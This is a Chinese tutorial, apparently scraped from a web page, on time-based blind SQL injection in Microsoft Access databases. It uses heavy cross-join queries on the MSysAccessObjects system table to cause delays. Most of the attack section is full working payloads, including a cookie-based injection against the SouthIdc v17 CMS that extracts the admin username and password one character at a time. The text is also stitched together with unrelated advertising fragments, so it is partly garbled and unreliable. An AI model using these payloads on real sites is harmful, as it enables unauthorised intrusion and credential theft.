Access是微软把数据库引擎的图形用户界面和软件开发工具结合在一起的一个数据库管理系统。本文我们来看看Access数据库基于时间sql盲注的实现记录。 概述 众所周知,access数据库是不支持基于时间的盲注方式,但是我们可以利用access的系统表MSysAccessObject
access是微软把数据库引擎的图形用户界面和软件开发工具结合在一起的一个数据库管理系统。本文我们来看看access数据库基于时间sql盲注的实现记录。
概述
众所周知,access数据库是不支持基于时间的盲注方式,但是我们可以利用access的系统表MSysAccessObjects,通过多负荷查询(Heavy Queries)的方式实现。
初步探究
我们以SouthIdcv17数据库为例
执行 select * from Southidc_About ,返回结果如下图。
如何实现time base injection 呢?我们就要利用这条语句
SELECT count(*) FROM MSysAccessObjects AS T1, MSysAccessObjects AS T2, MSysAccessObjects AS T3, MSysAccessObjects AS T4, MSysAccessObjects AS T5, MSysAccessObjects AS T6,
MSysAccessObjects AS T7,MSysAccessObjects AS T8,MSysAccessObjects AS T9,MSysAccessObjects AS T10,MSysAccessObjects AS T11,MSysAccessObjects AS T12
具体实现方式如下:
select * from Southidc_About where (SELECT count(*) FROM MSysAccessObjects AS T1, MSysAccessObjects AS T2, MSysAccessObjects AS T3, MSysAccessObjects AS T4, MSysAccessObjects AS T5, MSysAccessObjects AS T6,
MSysAccessObjects AS T7,MSysAccessObjects AS T8,MSysAccessObjects AS T9,MSysAccessObjects AS T10,MSysAccessObjects AS T11,MSysAccessObjects AS T12)>0 and (select top 1 asc(mid(AdminName+Password,1,1)) from
Southidc_Admin)=97
我们可以执行一次,观察效果。
很明显,经历了大约40s才返回结果
当我们执行如下语句时,也就是把最后的97改为96
select * from Southidc_About where (SELECT count(*) FROM MSysAccessObjects AS T1, MSysAccessObjects AS T2, MSysAccessObjects AS T3, MSysAccessObjects AS T4, MSysAccessObjects AS T5, MSysAccessObjects AS T6,
MSysAccessObjects AS T7,MSysAccessObjects AS T8,MSysAccessObjects AS T9,MSysAccessObjects AS T10,MSysAccessObjects AS T11,MSysAccessObjects AS T12)>0 and (select top 1 asc(mid(AdminName+Password,1,1)) from
Southidc_Admin)=96
很快就执行完毕,没有延时。
很明显,我们通过where条件后的
华友协同办公管理系统(华友OA),基于微软最新的.net 2.0平台和SQL Server数据库,集成强大的Ajax技术,采用多层分布式架构,实现统一办公平台,功能强大、价格便宜,是适用于企事业单位的通用型网络协同办公系统。 系统秉承协同办公的思想,集成即时通讯、日记管理、通知管理、邮件管理、新闻、考勤管理、短信管理、个人文件柜、日程安排、工作计划、工作日清、通讯录、公文流转、论坛、在线调查、
0
(SELECT count(*) FROM MSysAccessObjects AS T1, MSysAccessObjects AS T2, MSysAccessObjects AS T3, MSysAccessObjects AS T4, MSysAccessObjects AS T5, MSysAccessObjects AS T6,
MSysAccessObjects AS T7,MSysAccessObjects AS T8,MSysAccessObjects AS T9,MSysAccessObjects AS T10,MSysAccessObjects AS T11,MSysAccessObjects AS T12)>0
实现了延时,但需要注意的是这里where后的条件是有顺序的,实现延时的语句必须在
1(select top 1 asc(mid(AdminName+Password,1,1)) from Southidc_Admin)=97
之前,为什么呢?实验得出的结论。
实例实现
在SouthIdc 17 中,有一处sql注入漏洞,,但是常规的方法并不能成功利用漏洞。漏洞代码如下:
虽然程序把Post和Get的数据进行了过滤,但是我们依旧我可以通过Cookie的提交方式进行注入。
好,我们实现一下注入利用。
我们需要注入的语句为:
select * from Southidc_"&request("Range")&"Sort where ViewFlag and ParentID="&ParentID&" order by ID asc
通过提交cookie
Range=DownSort where (SELECT count(*) FROM MSysAccessObjects AS T1, MSysAccessObjects AS T2, MSysAccessObjects AS T3, MSysAccessObjects AS T4, MSysAccessObjects AS T5, MSysAccessObjects AS T6, MSysAccessObjects AS T7,MSysAccessObjects AS T8,MSysAccessObjects AS T9,MSysAccessObjects AS T10,MSysAccessObjects AS T11,MSysAccessObjects AS T12)>0 and (select top 1 asc(mid(AdminName+Password,1,1)) from Southidc_Admin)=32 and 1=1 union select NULL,NULL,NULL,NULL,NULL,NULL from Southidc_image
ParentID为程序上部传进的值,最终的语句为:
1select * from Southidc_DownSort where (SELECT count(*) FROM MSysAccessObjects AS T1, MSysAccessObjects AS T2, MSysAccessObjects AS T3, MSysAccessObjects AS T4, MSysAccessObjects AS T5, MSysAccessObjects AS T6, MSysAccessObjects AS T7,MSysAccessObjects AS T8,MSysAccessObjects AS T9,MSysAccessObjects AS T10,MSysAccessObjects AS T11,MSysAccessObjects AS T12)>0 and (select top 1 asc(mid(AdminName+Password,1,1)) from Southidc_Admin)=32 and 1=1 union select NULL,NULL,NULL,NULL,NULL,NULL from Southidc_imageSort where ViewFlag and ParentID=1
我们可以在查询器中看一下效果
96时,不延时,如图:
97时延时,效果如下图:
接下来,我们可以利用上述语句进行exp的编写,笔者这里用python
核心代码如下:
每个人都需要一台速度更快、更稳定的 PC。随着时间的推移,垃圾文件、旧注册表数据和不必要的后台进程会占用资源并降低性能。幸运的是,许多工具可以让 Windows 保持平稳运行。
广告Copyright 2014-2025 https://www.php.cn/ All Rights Reserved | php.cn | 湘ICP备2023035733号
387
收藏
